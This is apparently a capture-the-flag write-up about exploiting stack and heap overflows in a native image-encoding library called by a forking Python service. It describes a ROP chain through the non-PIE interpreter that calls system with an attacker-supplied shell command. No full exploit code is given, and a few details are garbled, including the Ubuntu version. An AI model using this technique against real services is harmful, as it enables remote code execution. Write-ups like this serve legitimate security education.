The challenge consisted of a Python service which encodes a user-supplied message in a user-supplied image using a native Python library. Due to missing (wrong) length checks, the binary allowed for buffer overflows on the stack as well as on the heap.
The service runner (service.py) is a forking server, which performs the following operations for each connection:
3.5.2 (default, Nov 23 2017, 16:37:01) \n[GCC 5.4.0 20160609])
The native library (xtproc.so) compiled for x86-64 provides a single function
process, which takes a three-dimensional
numpy array for the image data and the message as
bytes object as parameters. The function first transforms the image data into a contiguous form and allocates a new output array with the same size, which is returned in the end.
At this point, the function
xor_trick is called, which performs the actual transformation. The function takes six arguments and is apparently written in in assembly by hand. In pseudo-code:
long xor_trick(long width, long height, const char* inbuf, char* outbuf, size_t msglen, const char* msg) mangler = "\x2A\x84\x10\x42\x1E\x5C\x14\xC5\x2A\x84\x10\x42\x1E\x5C\x14\xC5" buf = alloca(width * height * 3) // size aligned to 16 for i = 0; i < msglen; i += 16 buf[i:i+16] = msg[i:i+16] ^ mangler for i = 0; i < msglen; i++ for bit = 0; bit < 8; bit += 2 r13b:r14b:r15b = inbuf[0:3] inbuf += 3 byte = buf[i] >> bit hi = (byte >> 1) & 1 lo = byte & 1 if (r13b ^ r14b ^ lo) r13b ^= 1 else if (r14b ^ r15b ^ hi) r15b ^= 1 outbuf[0:3] = r13b:r14b:r15b outbuf += 3
We can observe two buffer overflows in this code:
This implies that we can easily control the
rip by supplying an image of dimensions 1x1 and a large enough message (first
0x48 bytes are ignored/stored in registers). However, note that we always overflow the stack buffer and the heap buffer at the same time.
But where to go from here? Even though the server is forking, implying that addresses are the same on different connections, we don’t know the address of the libc or similar. And although we are able to leak some pointers, they are not helpful at all, since we don’t know what they mean.
At this point, we tried to find the binary of the Python interpreter itself, since some detailed information was given. It turned out that the Python3 of an updated Ubuntu 15.04.3 gives exactly the same version identifier and to our surprise, it wasn’t a position-independent executable but linked to a static address.
Our first attempt was to jump to the interpreter loop, first using
Py_Main(0, NULL) and then using
PyRun_InteractiveLoop(stdin, ""). Unfortunately, stdio was not bound to our socket, which we circumvented by calling
dup2(4, 0) and
dup2(4, 1) at the beginning of our ROP-chain. But alas! For some (unknown) reason, reading from the socket always failed with
EAGAIN. Writing to the socket is still possible, though. Then, we tried to run
PyRun_SimpleString with a string supplied using our message. But again, this didn’t work, as we had to smash the heap to get this far (see above) and of course the interpreter calls
free several times, causing the program to abort at some point.
Since it’s impossible to read from the socket, running
execve won’t help us either. Fortunately, since the interpreter is a big binary, tons of gadgets are available, allowing us to place a shell command on the stack and call
system with this value.